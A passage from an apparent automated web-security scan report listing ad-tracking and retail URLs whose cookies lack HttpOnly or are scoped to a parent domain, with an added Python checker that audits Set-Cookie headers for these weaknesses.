10.231. http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=63734715/hr=14/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

10.232. http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=74200963/hr=14/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

10.233. http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=74864635/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

10.234. http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=75388116/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

10.235. http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=76474621/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

10.236. http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=83985251/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

10.237. http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=90208788/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

10.238. http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=90827809/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

10.239. http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=91953648/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

10.240. http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=9352727/hr=12/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

10.241. http://r1-ads.ace.advertising.com/site=768034/size=728090/u=2/bnum=12937368/hr=12/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

10.242. http://r1-ads.ace.advertising.com/site=768034/size=728090/u=2/bnum=16141575/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

10.243. http://r1-ads.ace.advertising.com/site=768034/size=728090/u=2/bnum=1625138/hr=12/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

10.244. http://r1-ads.ace.advertising.com/site=768034/size=728090/u=2/bnum=27582677/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

10.245. http://r1-ads.ace.advertising.com/site=768034/size=728090/u=2/bnum=28183863/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

10.246. http://r1-ads.ace.advertising.com/site=768034/size=728090/u=2/bnum=3488355/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

10.247. http://r1-ads.ace.advertising.com/site=768034/size=728090/u=2/bnum=42950117/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

10.248. http://r1-ads.ace.advertising.com/site=768034/size=728090/u=2/bnum=45425146/hr=14/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

10.249. http://r1-ads.ace.advertising.com/site=768034/size=728090/u=2/bnum=54039788/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

10.250. http://r1-ads.ace.advertising.com/site=768034/size=728090/u=2/bnum=58502192/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

10.251. http://r1-ads.ace.advertising.com/site=768034/size=728090/u=2/bnum=63972603/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

10.252. http://r1-ads.ace.advertising.com/site=768034/size=728090/u=2/bnum=66502577/hr=14/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

10.253. http://r1-ads.ace.advertising.com/site=768034/size=728090/u=2/bnum=77103321/hr=14/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

10.254. http://r1-ads.ace.advertising.com/site=768034/size=728090/u=2/bnum=83819639/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

10.255. http://r1-ads.ace.advertising.com/site=768034/size=728090/u=2/bnum=83891309/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

10.256. http://r1-ads.ace.advertising.com/site=768034/size=728090/u=2/bnum=84418946/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

10.257. http://r1-ads.ace.advertising.com/site=768034/size=728090/u=2/bnum=93497556/hr=14/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

10.258. http://r1-ads.ace.advertising.com/site=804480/size=300250/u=2/bnum=2746764/hr=7/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

10.259. http://r1-ads.ace.advertising.com/site=804480/size=300250/u=2/bnum=76077167/hr=7/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

10.260. http://r1-ads.ace.advertising.com/site=804481/size=728090/u=2/bnum=22657113/hr=8/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

10.261. http://r1-ads.ace.advertising.com/site=804481/size=728090/u=2/bnum=91341378/hr=8/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

10.262. http://rover.ebay.com/ar/1/76417/4

10.263. http://rover.ebay.com/ar/1/76418/4

10.264. http://rp.gwallet.com/r1/ucm

10.265. http://rs.gwallet.com/r1/pixel/x113

10.266. http://rs.gwallet.com/r1/pixel/x9r8101111

10.267. http://rs.gwallet.com/r1/pixel/x9r8962146

10.268. http://rt.legolas-media.com/lgrt

10.269. http://sales.liveperson.net/hc/55601019/

10.270. http://sales.liveperson.net/hc/57386690/

10.271. http://segment-pixel.invitemedia.com/pixel

10.272. http://segs.btrll.com/v1/tpix/-/-/-/-/-/sid.6543418%22%20height=%221%22%20width=%221

10.273. http://services.krxd.net/geoip

10.274. http://services.krxd.net/pixel.gif

10.275. http://sync.mathtag.com/sync

10.276. http://tacoda.at.atwola.com/rtx/r.gif

10.277. http://tags.bluekai.com/site/2831

10.278. http://tags.bluekai.com/site/2939

10.279. http://tags.bluekai.com/site/3561

10.280. http://tags.bluekai.com/site/38

10.281. http://tags.bluekai.com/site/3834

10.282. http://tags.bluekai.com/site/450

10.283. http://tap.rubiconproject.com/oz/feeds/targus/profile

10.284. http://tap.rubiconproject.com/oz/sensor

10.285. http://tap.rubiconproject.com/partner/agent/rubicon/channels.js

10.286. http://va.px.invitemedia.com/pixel

10.287. http://va.px.invitemedia.com/set_partner_uid

10.288. http://view.c3metrics.com/c3VTabstrct-6-2.php

10.289. http://www.bizographics.com/collect/

10.290. http://www.burstnet.com/enlightn/7644//AC95/

10.291. http://www.capitalone.com/creditcards/gateway/

10.292. http://www.homedepot.com/wcsstore/hdus/en_US/images/layout/cartdrpdwn_Checkout.png

10.293. http://www.homedepot.com/wcsstore/hdus/en_US/images/layout/orange_arrow.gif

10.294. http://www.homedepot.com/webapp/wcs/stores/servlet/ProductDisplay

10.295. http://www.wtp101.com/admeld_sync
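
Sections 8, 10 and 11 are all Set-Cookie attribute findings: a cookie set over HTTPS without the Secure flag (section 8), a Domain attribute that names a parent of the responding host so that every sibling subdomain also receives the cookie (section 10), and a cookie readable from script because HttpOnly is absent (section 11). The checker below reproduces those three tests over raw Set-Cookie header values; it is an added example for this page, not code from the XSS.CX scanner or from any listed site, and the host names, cookie names and header values in it are constructed.

```python
"""Audit Set-Cookie headers for the three cookie weaknesses the report
tracks: parent-domain scope, missing HttpOnly, and missing Secure on
cookies set over HTTPS. Added checker, not part of the scan report;
the sample responses below are constructed."""
from dataclasses import dataclass, field


@dataclass
class CookieFinding:
    name: str
    issues: list = field(default_factory=list)


def parse_set_cookie(header: str) -> dict:
    """Split one Set-Cookie value into name, value and attributes.
    Attribute names are case-insensitive (RFC 6265), so they are lower-cased;
    flag attributes such as HttpOnly map to an empty string."""
    parts = [p.strip() for p in header.split(";")]
    name, _, value = parts[0].partition("=")
    attrs = {}
    for p in parts[1:]:
        if not p:
            continue
        k, _, v = p.partition("=")
        attrs[k.strip().lower()] = v.strip()
    return {"name": name.strip(), "value": value.strip(), "attrs": attrs}


def is_parent_scoped(host: str, domain_attr: str) -> bool:
    """True when the Domain attribute names a parent of the responding host,
    e.g. host www.example.com with Domain=.example.com. The cookie is then
    sent to every subdomain of that parent, trusted or not."""
    host = host.lower()
    dom = domain_attr.lower().lstrip(".")
    return dom != "" and dom != host and host.endswith("." + dom)


def audit_set_cookies(host: str, https: bool, headers: list[str]) -> list[CookieFinding]:
    """Return one CookieFinding per cookie that has at least one issue."""
    out = []
    for h in headers:
        c = parse_set_cookie(h)
        f = CookieFinding(c["name"])
        dom = c["attrs"].get("domain", "")
        if is_parent_scoped(host, dom):
            f.issues.append(f"scoped to parent domain {dom}")
        if "httponly" not in c["attrs"]:
            f.issues.append("no HttpOnly flag")
        # Secure only matters for a cookie set on an HTTPS response; on
        # plain HTTP the cookie is already exposed on the wire.
        if https and "secure" not in c["attrs"]:
            f.issues.append("no Secure flag on HTTPS response")
        if f.issues:
            out.append(f)
    return out


# Constructed sample: an HTTPS response from www.example.com.
SAMPLE_HTTPS = [
    "JSESSIONID=abc123; Path=/; Domain=.example.com",
    "pref=en; Path=/; HttpOnly; Secure",
    "uid=42; Domain=www.example.com; HttpOnly; Secure",
]

# Constructed sample: an HTTP response from a tracking host.
SAMPLE_HTTP = ["id=xyz; Domain=.example.net; Path=/; Expires=Wed, 21 Oct 2015 07:28:00 GMT"]


if __name__ == "__main__":
    for host, https, hdrs in [("www.example.com", True, SAMPLE_HTTPS),
                              ("t.example.net", False, SAMPLE_HTTP)]:
        for finding in audit_set_cookies(host, https, hdrs):
            print(host, finding.name, finding.issues)
```

Two caveats when reading sections 10 and 11 against this check. Parent-domain scope is a real weakness only where a less trusted host shares the parent; an ad or analytics domain that deliberately sets one cookie for all of its own subdomains is doing what it intends. And a missing HttpOnly flag matters for a cookie that carries a session or identity token; for a pure tracking identifier it changes little, so prioritise the entries on hosts where the user actually logs in.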

11. Cookie without HttpOnly flag set

11.1. http://afe.specificclick.net/

11.2. http://afe.specificclick.net/serve/v=5

11.3. http://cts-log.channelintelligence.com/

11.4. http://fw.adsafeprotected.com/rjss/ads.pointroll.com/10013/102761/PortalServe/

11.5. http://fw.adsafeprotected.com/rjss/ads.pointroll.com/10013/102769/PortalServe/

11.6. http://lightsquared.com/

11.7. http://login.dotomi.com/ucm/UCMController

11.8. http://pixel.adsafeprotected.com/jspix

11.9. http://pixel.everesttech.net/1688/i

11.10. http://sales.liveperson.net/visitor/addons/deploy.asp

11.11. http://sales.liveperson.net/visitor/addons/deploy.asp

11.12. http://sales.liveperson.net/visitor/addons/deploy.asp

11.13. http://sales.liveperson.net/visitor/addons/deploy.asp

11.14. http://snas.nbcuni.com/snas/api/getRemoteDomainCookies

11.15. http://t.mookie1.com/t/v1/imp

11.16. http://ttwbs.channelintelligence.com/

11.17. http://www.creditcards.com/actions/clickBack.php

11.18. http://www.creditcards.com/oc/

11.19. http://www.creditcards.com/xtrack.php

11.20. http://www.homedepot.com/Outdoors-Outdoor-Power-Equipment-Riding-Mowers-Gas-Riding-Mowers/h_d1/N-5yc1vZbx9b/h_d2/Navigation

11.21. http://www.homedepot.com/Outdoors-Outdoor-Power-Equipment/h_d1/N-5yc1vZbx5c/h_d2/Navigation

11.22. http://www.homedepot.com/Outdoors-Outdoor-Power-Equipment/h_d1/N-5yc1vZbx5c/h_d2/Navigation

11.23. http://www.homedepot.com/webapp/wcs/stores/servlet/Bopis2OverLay

11.24. http://www.homedepot.com/webapp/wcs/stores/servlet/Navigation

11.25. http://www.homedepot.com/webapp/wcs/stores/servlet/OrderCalculate

11.26. http://www.homedepot.com/webapp/wcs/stores/servlet/OrderItemAddService

11.27. http://www.homedepot.com/webapp/wcs/stores/servlet/OrderItemDisplay

11.28. http://www.homedepot.com/webapp/wcs/stores/servlet/QuickViewService

11.29. http://www.ilslaunch.com/skyterra-1-mission-control

11.30. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php

11.31. http://a.amxdt.com/px/

11.32. http://a.rfihub.com/cm

11.33. http://a.rfihub.com/cm

11.34. http://a.rfihub.com/sed

11.35. http://a.rfihub.com/tk.gif

11.36. http://a.tribalfusion.com/i.match

11.37. http://a.tribalfusion.com/j.ad

11.38. http://a1.interclick.com/ColDta.aspx

11.39. http://a1.interclick.com/Segment.aspx

11.40. http://a1.interclick.com/getInPageJSProcess.aspx

11.41. http://a1.interclick.com/getInPageJSProcess.aspx

11.42. http://ad.yieldmanager.com/imp

11.43. http://ad.yieldmanager.com/pixel

11.44. http://ad.yieldmanager.com/unpixel

11.45. http://ads.bridgetrack.com/track/f/

11.46. http://ads.revsci.net/adserver/ako

11.47. http://ads.revsci.net/adserver/ako

11.48. http://ads.revsci.net/adserver/ako

11.49. http://ads.undertone.com/ajs.php

11.50. http://ads.undertone.com/fc.php

11.51. http://ads.undertone.com/l

11.52. http://ads.undertone.com/l

11.53. http://ads.undertone.com/l

11.54. http://ads.undertone.com/l

11.55. http://ads.undertone.com/l

11.56. http://ads.undertone.com/l

11.57. http://ads.undertone.com/l

11.58. http://ads.undertone.com/l

11.59. http://ads.undertone.com/l

11.60. http://ads.undertone.com/l

11.61. http://ads.undertone.com/l

11.62. http://ads.undertone.com/l

11.63. http://ads.undertone.com/l

11.64. http://ads.undertone.com/l

11.65. http://ads.undertone.com/l

11.66. http://adsfac.us/ag.asp

11.67. http://adsfac.us/ag.asp

11.68. http://ak1.abmr.net/is/ads.undertone.com

11.69. http://ak1.abmr.net/is/r1-ads.ace.advertising.com

11.70. http://ak1.abmr.net/is/tag.admeld.com

11.71. http://ak1.abmr.net/is/www.homedepot.com

11.72. http://amch.questionmarket.com/adsc/d844890/33/39959888/decide.php

11.73. http://amch.questionmarket.com/adsc/d844890/33/39959895/decide.php

11.74. http://amch.questionmarket.com/adsc/d844890/33/39959897/decide.php

11.75. http://api.bizographics.com/v1/profile.json

11.76. http://api.bizographics.com/v1/profile.redirect

11.77. http://ar.voicefive.com/b/wc_beacon.pli

11.78. http://ar.voicefive.com/bmx3/broker.pli

11.79. http://ar.voicefive.com/bmx3/broker.pli

11.80. http://ar.voicefive.com/bmx3/broker.pli

11.81. http://b.scorecardresearch.com/b

11.82. http://b.scorecardresearch.com/r

11.83. http://b.voicefive.com/b

11.84. http://bs.serving-sys.com/BurstingPipe/adServer.bs

11.85. http://c7.zedo.com/img/bh.gif

11.86. http://cas.criteo.com/delivery/afr.php

11.87. http://citi.bridgetrack.com/usc/_spredir.htm

11.88. http://citi.bridgetrack.com/usc/_spredir.htm

11.89. http://click.linksynergy.com/fs-bin/click

11.90. http://creditcards.citicards.com/usc/Dividend/May2011/Q2/12mo/100cash/default.htm

11.91. http://creditcards.citicards.com/usc/platinum/MC/external/affiliate/Mar2011/default.htm

11.92. http://creditcards.citicards.com/usc/platinum/Visa/external/affiliate/Mar2011/default.htm

11.93. http://creditcards.citicards.com/usc/thankyou/Preferred/external/May2011/50GC/default.htm

11.94. http://creditcards.citicards.com/usc/value/diamond_preferred/MAr2011pricing/external/default.htm

11.95. http://d7.zedo.com/img/bh.gif

11.96. http://dis.ny.us.criteo.com/dis/dis.aspx

11.97. http://idcs.interclick.com/Segment.aspx

11.98. http://ilslaunch.app2.hubspot.com/salog.js.aspx

11.99. http://image2.pubmatic.com/AdServer/Pug

11.100. http://imp.constantcontact.com/imp/cmp.jsp

11.101. http://js.revsci.net/common/pcx.js

11.102. http://js.revsci.net/gateway/gw.js

11.103. http://leadback.advertising.com/adcedge/lb

11.104. http://map.media6degrees.com/orbserv/hbpix

11.105. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/300x250/jx/ss/a/1049999702@x15

11.106. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/300x250/jx/ss/a/1061037567@x15

11.107. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/300x250/jx/ss/a/1071006765@x15

11.108. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/300x250/jx/ss/a/1102913360@x15

11.109. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/300x250/jx/ss/a/1127856009@x15

11.110. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/300x250/jx/ss/a/1245329572@x15

11.111. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/300x250/jx/ss/a/1275267067@x15

11.112. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/300x250/jx/ss/a/1286122757@x15

11.113. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/300x250/jx/ss/a/1461570951@x15

11.114. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/300x250/jx/ss/a/1584817229@x15

11.115. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/300x250/jx/ss/a/1608535405@x15

11.116. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/300x250/jx/ss/a/1646228634@x15

11.117. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/300x250/jx/ss/a/1662691403@x15

11.118. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/300x250/jx/ss/a/1729780354@x15

11.119. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/300x250/jx/ss/a/1767572891@x15

11.120. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/300x250/jx/ss/a/1809071643@x15

11.121. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/300x250/jx/ss/a/1837611586@x15

11.122. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/300x250/jx/ss/a/1851473663@x15

11.123. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/300x250/jx/ss/a/1933034357@x15

11.124. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/300x250/jx/ss/a/1938155974@x15

11.125. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/728x90/jx/ss/a/1059242575@Top1

11.126. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/728x90/jx/ss/a/1091147736@Top1

11.127. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/728x90/jx/ss/a/1098629905@Top1

11.128. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/728x90/jx/ss/a/1187700357@Top1

11.129. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/728x90/jx/ss/a/1236153237@Top1

11.130. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/728x90/jx/ss/a/1319798396@Top1

11.131. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/728x90/jx/ss/a/1359015114@Top1

11.132. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/728x90/jx/ss/a/1443368947@Top1

11.133. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/728x90/jx/ss/a/1512823451@Top1

11.134. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/728x90/jx/ss/a/1515366038@Top1

11.135. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/728x90/jx/ss/a/1551279173@Top1

11.136. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/728x90/jx/ss/a/1704218535@Top1

11.137. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/728x90/jx/ss/a/1726433512@Top1

11.138. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/728x90/jx/ss/a/1777416209@Top1

11.139. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/728x90/jx/ss/a/1815229995@Top1

11.140. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/728x90/jx/ss/a/1861592040@Top1

11.141. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/728x90/jx/ss/a/1885484252@Top1

11.142. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/728x90/jx/ss/a/1930646721@Top1

11.143. http://optimized-by.rubiconproject.com/a/6451/11953/20435-15.js

11.144. http://optimized-by.rubiconproject.com/a/6451/11953/20435-2.js

11.145. http://optimized-by.rubiconproject.com/a/dk.html

11.146. http://optimized-by.rubiconproject.com/a/dk.html

11.147. http://optimized-by.rubiconproject.com/a/dk.js

11.148. http://optimized-by.rubiconproject.com/a/dk.js

11.149. http://p.opt.fimserve.com/bht/

11.150. http://pbid.pro-market.net/engine

11.151. http://phoenix.untd.com/TRCK/RGST

11.152. http://pix04.revsci.net/D10889/a1/0/3/0.gif

11.153. http://pix04.revsci.net/D10889/a1/0/3/0.gif

11.154. http://pix04.revsci.net/D10889/a1/0/3/0.gif

11.155. http://pix04.revsci.net/E06560/b3/0/3/noscript.gif

11.156. http://pix04.revsci.net/G07608/a4/0/0/pcx.js

11.157. http://pix04.revsci.net/I10985/b3/0/3/1008211/111571878.js

11.158. http://pix04.revsci.net/I10985/b3/0/3/1008211/118546994.js

11.159. http://pix04.revsci.net/I10985/b3/0/3/1008211/128597095.js

11.160. http://pix04.revsci.net/I10985/b3/0/3/1008211/149141737.js

11.161. http://pix04.revsci.net/I10985/b3/0/3/1008211/152539728.js

11.162. http://pix04.revsci.net/I10985/b3/0/3/1008211/153416135.js

11.163. http://pix04.revsci.net/I10985/b3/0/3/1008211/167338616.js

11.164. http://pix04.revsci.net/I10985/b3/0/3/1008211/174739392.js

11.165. http://pix04.revsci.net/I10985/b3/0/3/1008211/178674175.js

11.166. http://pix04.revsci.net/I10985/b3/0/3/1008211/204994515.js

11.167. http://pix04.revsci.net/I10985/b3/0/3/1008211/20510025.js

11.168. http://pix04.revsci.net/I10985/b3/0/3/1008211/206078584.js

11.169. http://pix04.revsci.net/I10985/b3/0/3/1008211/209054641.js

11.170. http://pix04.revsci.net/I10985/b3/0/3/1008211/210088310.js

11.171. http://pix04.revsci.net/I10985/b3/0/3/1008211/235290478.js

11.172. http://pix04.revsci.net/I10985/b3/0/3/1008211/242178359.js

11.173. http://pix04.revsci.net/I10985/b3/0/3/1008211/252539645.js

11.174. http://pix04.revsci.net/I10985/b3/0/3/1008211/266352153.js

11.175. http://pix04.revsci.net/I10985/b3/0/3/1008211/266715150.js

11.176. http://pix04.revsci.net/I10985/b3/0/3/1008211/266829410.js

11.177. http://pix04.revsci.net/I10985/b3/0/3/1008211/271822828.js

11.178. http://pix04.revsci.net/I10985/b3/0/3/1008211/298241288.js

11.179. http://pix04.revsci.net/I10985/b3/0/3/1008211/306033605.js

11.180. http://pix04.revsci.net/I10985/b3/0/3/1008211/31221949.js

11.181. http://pix04.revsci.net/I10985/b3/0/3/1008211/319879025.js

11.182. http://pix04.revsci.net/I10985/b3/0/3/1008211/321200067.js

11.183. http://pix04.revsci.net/I10985/b3/0/3/1008211/325815715.js

11.184. http://pix04.revsci.net/I10985/b3/0/3/1008211/329181290.js

11.185. http://pix04.revsci.net/I10985/b3/0/3/1008211/351391247.js

11.186. http://pix04.revsci.net/I10985/b3/0/3/1008211/35234473.js

11.187. http://pix04.revsci.net/I10985/b3/0/3/1008211/352735390.js

11.188. http://pix04.revsci.net/I10985/b3/0/3/1008211/400010602.js

11.189. http://pix04.revsci.net/I10985/b3/0/3/1008211/4030732.js

11.190. http://pix04.revsci.net/I10985/b3/0/3/1008211/411814556.js

11.191. http://pix04.revsci.net/I10985/b3/0/3/1008211/434601309.js

11.192. http://pix04.revsci.net/I10985/b3/0/3/1008211/448263760.js

11.193. http://pix04.revsci.net/I10985/b3/0/3/1008211/450083429.js

11.194. http://pix04.revsci.net/I10985/b3/0/3/1008211/469061960.js

11.195. http://pix04.revsci.net/I10985/b3/0/3/1008211/47135208.js

11.196. http://pix04.revsci.net/I10985/b3/0/3/1008211/474207582.js

11.197. http://pix04.revsci.net/I10985/b3/0/3/1008211/48193081.js

11.198. http://pix04.revsci.net/I10985/b3/0/3/1008211/482745036.js

11.199. http://pix04.revsci.net/I10985/b3/0/3/1008211/518130278.js

11.200. http://pix04.revsci.net/I10985/b3/0/3/1008211/541993060.js

11.201. http://pix04.revsci.net/I10985/b3/0/3/1008211/572738137.js

11.202. http://pix04.revsci.net/I10985/b3/0/3/1008211/579855884.js

11.203. http://pix04.revsci.net/I10985/b3/0/3/1008211/602675862.js

11.204. http://pix04.revsci.net/I10985/b3/0/3/1008211/603496051.js

11.205. http://pix04.revsci.net/I10985/b3/0/3/1008211/609031637.js

11.206. http://pix04.revsci.net/I10985/b3/0/3/1008211/609523113.js

11.207. http://pix04.revsci.net/I10985/b3/0/3/1008211/61287048.js

11.208. http://pix04.revsci.net/I10985/b3/0/3/1008211/616476492.js

11.209. http://pix04.revsci.net/I10985/b3/0/3/1008211/623863779.js

11.210. http://pix04.revsci.net/I10985/b3/0/3/1008211/632139984.js

11.211. http://pix04.revsci.net/I10985/b3/0/3/1008211/656764106.js

11.212. http://pix04.revsci.net/I10985/b3/0/3/1008211/663059389.js

11.213. http://pix04.revsci.net/I10985/b3/0/3/1008211/677906397.js

11.214. http://pix04.revsci.net/I10985/b3/0/3/1008211/678221040.js

11.215. http://pix04.revsci.net/I10985/b3/0/3/1008211/697771504.js

11.216. http://pix04.revsci.net/I10985/b3/0/3/1008211/700812667.js

11.217. http://pix04.revsci.net/I10985/b3/0/3/1008211/7130573.js

11.218. http://pix04.revsci.net/I10985/b3/0/3/1008211/715243108.js

11.219. http://pix04.revsci.net/I10985/b3/0/3/1008211/719321222.js

11.220. http://pix04.revsci.net/I10985/b3/0/3/1008211/727551731.js

11.221. http://pix04.revsci.net/I10985/b3/0/3/1008211/743305953.js

11.222. http://pix04.revsci.net/I10985/b3/0/3/1008211/743306396.js

11.223. http://pix04.revsci.net/I10985/b3/0/3/1008211/747675233.js

11.224. http://pix04.revsci.net/I10985/b3/0/3/1008211/750853358.js

